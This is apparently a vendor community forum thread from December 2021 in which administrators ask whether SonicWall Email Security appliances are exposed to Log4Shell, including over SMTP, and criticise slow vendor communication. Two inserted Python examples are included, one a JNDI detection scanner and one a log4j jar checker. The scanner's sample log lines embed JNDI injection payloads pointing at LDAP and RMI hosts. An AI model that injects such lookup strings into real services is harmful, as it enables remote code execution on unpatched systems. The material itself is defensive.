ES vulnerable to Log4Shell?
BWC
Hi,
considering the fact that Email Security is using Log4j2 2.11.2, I'm asking myself whether the system is vulnerable to CVE-2021-44228 aka Log4Shell?
@David W or @Gailand do you have more insight because it should be checked at SNWL by now?
--Michael@BWC
Category: Email Security Appliances
Answers
@BWC We can check with engineering but keep in mind that in most cases we cannot comment unless it's in release notes.
Can you open a case for that and I can have Gailand follow up.
David Wilbur
Technical Support Senior Advisor, Premier Services, SME Email Security
According to the latest information on PSIRT, ES 10.x is not affected:
But the conclusion looks a bit strange to me, because "Apache Log4j project disclosed CVE-2021-44228, which is a Critical (CVSS 10.0) remote code execution vulnerability affecting Apache Log4j2 version <= 2.14.1. A subsequent security patch was released on Dec 10, 2021." and according to the Status information on a current ES 10.0.11 deployment it states Log4j2 2.11.2 as a component in the about.html.
I hope for the best and forward the PSIRT to my clients.
--Michael@BWC
Is this a bad joke? PSIRT changed its mind to
After review, version 10.x appears to be impacted by CVE-2021-44228. SonicWall is readying a HotFix to remediate the issue, which will be released shortly.
Thankfully I did not forward the false information to my customers, because it seems my suspicion was right.
One aspect which is still fuzzy, at least to me, is it only exploitable via HTTP/S or is SMTP a vector as well? Is it possible to send one of these JNDI strings in the SMTP dialog and have this logged and parsed?
--Michael@BWC
Use ESA here. Would like to know too.
Maybe ESA is using it on some where not https.
We have run a Tenable scan on the HTTPS port, which returned no result. Also tested the simple POC curl cmd with https://log4shell.huntress.com/
Result still negative. Not sure why they switched the content, maybe it is only affected under certain conditions.
My hunch was correct, SMTP is an option (shown below for Apache James), great, so any customer is at (potential) risk, even those not publishing HTTP/S. No word from SNWL so far, radio silence on my Engineering Ticket.
--Michael@BWC
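An added example, not code from this thread or from any appliance vendor: detection logic run over constructed sample log lines from an SMTP service and an HTTP service, showing that any client-supplied field an application logs through Log4j (HELO name, envelope sender, User-Agent) can carry a JNDI lookup string, so restricting HTTP/S alone does not settle the question. The log format and addresses are made up for the example.

```python
import re

# Case-insensitive match for a Log4j JNDI lookup and the protocol it names (ldap, rmi, dns, ...)
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)

# Constructed sample lines (not from any real system): an SMTP transaction log and an HTTP
# access log, both writing client-supplied fields through the logging framework.
SAMPLE_LOGS = [
    "2021-12-11T10:02:13Z smtp 192.0.2.10 HELO helo=mail.example.net",
    "2021-12-11T10:02:14Z smtp 192.0.2.10 MAIL sender=<${jndi:ldap://198.51.100.7:1389/a}>",
    "2021-12-11T10:02:15Z smtp 192.0.2.10 DATA subject=Invoice 4711",
    "2021-12-11T10:03:01Z http 203.0.113.5 GET /login ua=Mozilla/5.0",
    "2021-12-11T10:03:02Z http 203.0.113.5 GET /login ua=${JNDI:rmi://198.51.100.7/x}",
]

# Assumed line layout: <timestamp> <service> <client-ip> <free text>
LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<service>\w+) (?P<client>\S+) (?P<rest>.*)$")

def find_jndi_lookups(lines):
    """One hit per log line carrying a JNDI lookup: (timestamp, service, client, protocol)."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that do not follow the assumed layout
        lookup = JNDI_RE.search(m.group("rest"))
        if lookup:
            hits.append((m.group("ts"), m.group("service"), m.group("client"),
                         lookup.group(1).lower()))
    return hits

def services_with_hits(hits):
    """Which services saw lookup strings, i.e. which of them are exposed vectors."""
    return sorted({service for _, service, _, _ in hits})

if __name__ == "__main__":
    found = find_jndi_lookups(SAMPLE_LOGS)
    for hit in found:
        print("JNDI lookup via %s from %s at %s (protocol %s)" % (hit[1], hit[2], hit[0], hit[3]))
    print("affected services:", services_with_hits(found))
```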
Everyone please remember that there will be no official comment to this issue here in the community due to this being a vulnerability.
Also there will most likely be nothing on your Jira BWC until there is a formal announcement.
We do not use Apache for SMTP either.
The SMTP engine is our own coded product.
David Wilbur
Technical Support Senior Advisor, Premier Services, SME Email Security
@David W I know it's the code from MailFrontier, but if this code is using log4j, aren't we back at square one?
Apache James was just an example that it is not HTTP/S only, any service can be at risk.
--Michael@BWC
The SMTP code does not use anything from Apache.
Please be watching the page for any updates on this issue.
You will see updates to it throughout the day.
David Wilbur
Technical Support Senior Advisor, Premier Services, SME Email Security
Any update on this? I've seen no updates "throughout the day..." Asking for a friend.🙄
Hi,
yeah, a friend of mine is also very interested 🤨. Is there any update on this topic?
KR, Chris
@tbrame @C_Z you can't expect fast and accurate information on another CVSS 10 these days 😪, I'm sure behind the scenes SNWL is working hard on this, but as usual not very communicative to the outside.
Friends don't leave friends hanging in the dark.
--Michael@BWC
@BWC: It would calm me down to know if it's enough to disable all access except the SMTP port. That's what we have done.
@C_Z I feel you and this is what I expected from a vendor in the first place. If blocking HTTP/S is the one and only needed mitigation until a fix is available everything would be somewhat fine. But not knowing if the essential SMTP service is at risk causes some anxiety.
But this might be corporate policy, in retrospect 2021 was not a good year in ramping up the communication. SMA, just sayin.
--Michael@BWC
SWL seems quick to put a marketing slick for the event, time to clean up there own side of the street though. Totally agree, at least let us know if SMTP service is at risk or not.
@David W Can you please give advice or talk to your management immediately, because this is not an appropriate way to handle a security incident of this dimension. It's a CVSS of 10.0!
We need advice because your (SNWL) system is a main and critical part of our infra. Being vulnerable here is not a small matter. Our companies trust in SNWL, and SNWL damages its reputation and gambles away trust. Every single other company has managed to publish advice for mitigation in the last 24h - not SNWL.
Btw. what do you mean with "shortly" in this advisory? https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032
KR, Chris
Yes, agree with @C_Z here. We need to know if the SMTP is vulnerable to exploitation. I've closed off everything but ports 25 and 587 and I've even tried testing the SMTP with Huntress Log4Shell tester and come up with nothing, but I'm not a sophisticated hacker to be able to really know for sure.
A comment from SW about whether the SMTP is vulnerable to exploitation would be most useful here. Otherwise, those of us who use ESA are without any peace of mind.
Looks like a patch was just posted for this. Good luck and stay safe!
And maybe another patch will be necessary, we'll see.
Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released (thehackernews.com)
--Michael@BWC
@BWC , I was about to update the firmware for ES 5000 and you just dropped this news. I guess I will hold a little longer.
And, hoping SMTP/IMAP/POP3 are not vulnerable.
I am following you since DEC 10 BTW. Thanks for sharing the updates.
DT_AI
@BWC Yes, it's not good but not so bad either (CVSS 3.7). I'm wondering why SNWL is doing so badly with communication. It's like back in the 80's/90's: security by obscurity. I'm feeling old now, and it would be nice if SNWL management would arrive in this century with appropriate communication for IT professionals.
@David W Is there now any information on which services were affected?
I applied the latest patch to my ESA and so far, nothing has changed (that's a good thing). Hoping the new vulnerability just discovered doesn't affect the current patch.
It is proved that HTTPS is vulnerable to RCE on 10.0.11.
10.0.12 already fixed the HTTPS issue.
The new vulnerability is not a critical one, don't think they will and it need an immediate patch.
Applied the latest patch on ES 5000 and seems working good so far.
Even a CVSS 3.7 which could lead to "just" a DoS attack should be fixed ASAP, at least in my opinion. log4j 2.16 is available and 2.15 is incomplete, doesn't sound that hard to do. Customers are not that happy seeing their SMTP gateways at any (avoidable) risk.
No word from SNWL if they removed the JndiLookup Class manually, which would be another mitigation.
--Michael@BWC
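An added example, not code from this thread or from SonicWall: a Python check for the two states the post distinguishes, a log4j-core jar upgraded to 2.17.0 versus one where only the JndiLookup class was deleted manually. It reads the manifest version and looks for the class entry; the jar it inspects is constructed in memory as sample data.

```python
import io
import re
import zipfile
# The class whose removal is the Apache-documented manual mitigation for the JNDI RCE:
#   zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
JNDI_LOOKUP_ENTRY = "org/apache/logging/log4j/core/lookup/JndiLookup.class"

def parse_version(text):
    """Turn '2.11.2' into (2, 11, 2); None if the manifest value is not a dotted number."""
    m = re.fullmatch(r"(\d+)\.(\d+)(?:\.(\d+))?", text.strip())
    return tuple(int(x or 0) for x in m.groups()) if m else None

def inspect_log4j_jar(jar_bytes):
    """Read Implementation-Version from the manifest and check whether JndiLookup.class is shipped."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        names = set(jar.namelist())
        version = None
        if "META-INF/MANIFEST.MF" in names:
            manifest = jar.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
            for line in manifest.splitlines():
                key, _, value = line.partition(":")
                if key.strip() == "Implementation-Version":
                    version = parse_version(value)
    return {"version": version, "jndi_lookup_present": JNDI_LOOKUP_ENTRY in names}

def assess(info):
    """'patched' from 2.17.0 on; 'partial' when JNDI lookups are gone (class removed, or 2.16.x
    which disables them) but the 2.17.0 fix for CVE-2021-45105 is missing; else 'vulnerable'."""
    v = info["version"]
    if v and v >= (2, 17, 0):
        return "patched"
    if (v and v >= (2, 16, 0)) or not info["jndi_lookup_present"]:
        return "partial"
    return "vulnerable"

def make_test_jar(version, include_jndi):
    """Constructed stand-in for a log4j-core jar (sample data, not a real artifact)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr("META-INF/MANIFEST.MF", f"Manifest-Version: 1.0\nImplementation-Version: {version}\n")
        jar.writestr("org/apache/logging/log4j/core/Logger.class", b"\xca\xfe\xba\xbe")
        if include_jndi:
            jar.writestr(JNDI_LOOKUP_ENTRY, b"\xca\xfe\xba\xbe")
    return buf.getvalue()

if __name__ == "__main__":
    for ver, jndi in (("2.11.2", True), ("2.11.2", False), ("2.17.0", True)):
        print(ver, "JndiLookup present" if jndi else "JndiLookup removed", assess(inspect_log4j_jar(make_test_jar(ver, jndi))))
```

Run it against a real jar with `assess(inspect_log4j_jar(open(path, "rb").read()))`; a "partial" result on a 2.11.2 jar means the class was stripped but the later CVEs are still open.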
CVE-2021-45046 got a bump from 3.7 to 9.0 ... still ignoring?
--Michael@BWC
Well, it keeps on coming, CVE-2021-45105 is the new member of the log4j debacle, CVSS 7.5 (High).
It seems another patch with log4j 2.16 is coming, according to PSIRT, but this will not cover the above. 2.17 is the recommended version (by now).
I already added this to my Engineering Ticket, but I'm sure SNWL is aware already.
--Michael@BWC
Maybe the next update for on-premise deployments is near, at least HES got another update to 10.0.13.7219.
This is all speculation, because as usual there is no specific information from SNWL.
--Michael@BWC
They have updated the advisory.
A new ES HotFix is undergoing testing to include 2.17.0 to address CVE-2021-45046 and CVE-2021-45105. Customers should expect to receive direct communication regarding firmware upgrades, and the planned release including log4j 2.17.0 is tentatively set for 22-DEC-2021.
I got an e-mail telling me to immediately upgrade to 10.0.13 but it's not showing as available...